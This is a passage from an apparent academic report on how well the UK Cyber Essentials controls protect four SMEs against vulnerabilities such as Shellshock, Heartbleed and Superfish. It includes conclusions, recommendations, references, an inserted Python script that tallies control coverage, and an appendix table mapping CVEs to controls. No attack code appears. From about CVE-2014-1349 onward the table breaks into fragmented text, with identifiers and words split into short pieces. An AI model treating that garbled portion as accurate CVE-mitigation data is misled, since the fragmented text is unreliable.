ShellShock: Without Cyber Essentials in place, SMEs 1 and 2 would be at risk from ‘Shellshock’, as they both operate Unix/Linux based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SMEs 1 and 2 would be fully protected, and it is likely that SMEs 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The ‘Heartbleed’ bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the ‘Superfish’ issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following ‘normal’ patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.


Conclusions

The Cyber Essentials security tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts, but also from users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.

Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education & Awareness along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge on safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action in more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber-security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (~600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, by contrast, isn't necessarily understood by individuals as a tool that greatly improves cyber-security.

Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and, as such, is vital to an organisation's cyber-safety.
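As an added example (not from the report), the following Python reads rows of the appendix's Cyber Controls Applicability table (CVE, applicability to SMEs 1-4 and the idealised network, the No CE verdict, and the With CE verdict with the controls that deliver it), written here as pipe-separated lines, and computes the kind of per-control coverage figure quoted above. The six rows are taken from that table, so the percentages are for the sample only, not the report's 87.5% and 10%; the function names are this example's own.

```python
"""Per-control mitigation coverage from rows of the appendix's Cyber Controls
Applicability table, the kind of figure behind "Patch Management ... 87.5%".

Added example, not from the report. Rows are written as pipe-separated lines:
CVE, applicability flags for SME 1-4 and the idealised network, the No CE
verdict, and the With CE verdict followed by the controls that deliver it.
"""
import re
from collections import Counter

# Six rows copied from the appendix table; far fewer than the report's two
# hundred, so the percentages below describe this sample only.
SAMPLE_ROWS = """\
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
"""

NETWORKS = ("SME 1", "SME 2", "SME 3", "SME 4", "Idealised")
VERDICTS = ("Mitigated", "Partially Mitigated", "Not Mitigated")


def parse_row(line):
    """Return (cve, flags, with_ce_verdict, controls) for one table row."""
    cells = [c.strip() for c in line.split("|")]
    if len(cells) != 8:
        raise ValueError("expected 8 cells, got %d: %r" % (len(cells), line))
    cve, flags, with_ce = cells[0], cells[1:6], cells[7]
    verdict, _, controls_text = with_ce.partition(" - ")
    if verdict not in VERDICTS:
        raise ValueError("unknown With CE verdict %r in %r" % (verdict, line))
    # Drop bracketed qualifiers first ("Secure Configuration (User Policy)")
    # so every variant of a control counts under one name and so an '&'
    # inside a qualifier does not split the control; then split the list.
    controls_text = re.sub(r"\s*\([^)]*\)", "", controls_text)
    controls = [p.strip() for p in re.split(r",|&", controls_text) if p.strip()]
    return cve, flags, verdict, controls


def coverage(rows_text):
    """Summarise a block of rows.

    Returns the With CE verdict counts, how many rows apply to each network
    (a 'y' flag), and for each control the percentage of rows whose With CE
    cell lists it. A control listed under a 'Not Mitigated' verdict (the
    "don't install" cases) is still counted, as it is in the table.
    """
    rows = [parse_row(l) for l in rows_text.splitlines() if l.strip()]
    total = len(rows)
    verdicts = Counter(verdict for _, _, verdict, _ in rows)
    applicable = {
        net: sum(1 for _, flags, _, _ in rows if flags[i] == "y")
        for i, net in enumerate(NETWORKS)
    }
    hits = Counter()
    for _, _, _, controls in rows:
        for control in set(controls):
            hits[control] += 1
    control_pct = {c: round(100.0 * n / total, 1) for c, n in hits.items()}
    return {"total": total, "verdicts": dict(verdicts),
            "applicable": applicable, "control_pct": control_pct}


if __name__ == "__main__":
    summary = coverage(SAMPLE_ROWS)
    print("rows:", summary["total"], "verdicts:", summary["verdicts"])
    for control, pct in sorted(summary["control_pct"].items(),
                               key=lambda kv: -kv[1]):
        print("%-22s %5.1f%%" % (control, pct))
```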

Recommendations

To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle these other types of attacks mentioned above, which were not under the scope of this report.


References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK and Department for Business, Innovation & Skills. Cyber-security Information Sharing Partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber Essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber Essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber Essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka ShellShock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


Cyber Controls Applicability

CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (no JS)
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1

34

9y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tF

irew

all

Acc

ess

Co

ntr

ol

CV

E-2

01

4-1

35

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

M

alw

are

Pro

tect

ion

P

atch

Man

agem

ent

CV

E-2

01

4-1

37

0y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Mal

war

eP

rote

ctio

n

Pat

chM

anag

emen

tC

VE

-20

14

-13

79

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-M

alw

are

Pro

tect

ion

P

atch

Man

agem

ent

CV

E-2

01

4-1

37

9n

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tA

nti

-Mal

war

eC

VE

-20

14

-13

82

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

list

Pat

chM

anag

emen

tC

VE

-20

14

-14

66

yn

nn

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

t

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

4-1

47

2y

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tP

atch

Man

agem

ent

CV

E-2

01

4-1

47

7y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-15

18

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agam

ent

CV

E-2

01

4-1

56

3y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-15

65

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agam

ent

CV

E-2

01

4-1

58

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-17

01

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-17

40

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agam

ent

CV

E-2

01

4-1

74

4y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-17

53

yn

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

ampP

atch

Man

agem

ent

CV

E-2

01

4-1

80

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-18

08

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Web

site

Bla

cklis

tin

gamp

Pat

chM

anag

amen

tC

VE

-20

14

-18

11

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

CV

E-2

01

4-1

81

2y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Str

on

gP

assw

ord

s(U

ser

Acc

ess)

CV

E-2

01

4-2

01

4n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

4-2

10

3n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

DO

SC

VE

-20

14

-21

09

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agem

ent

CV

E-2

01

4-2

36

4n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-2

41

6n

yy

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-2

55

4n

ny

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tA

cces

sC

on

tro

lW

ebsi

teB

lack

listi

ng

CV

E-2

01

4-2

64

3n

yn

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

tro

ng

Pas

swor

ds

(Use

rA

cces

s)C

VE

-20

14

-27

42

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

An

tiD

OS

CV

E-2

01

4-2

76

8y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-27

89

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-2

79

1y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-27

94

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-2

80

8y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-28

21

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-3

44

4n

nn

yn

No

tM

itig

ated

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag
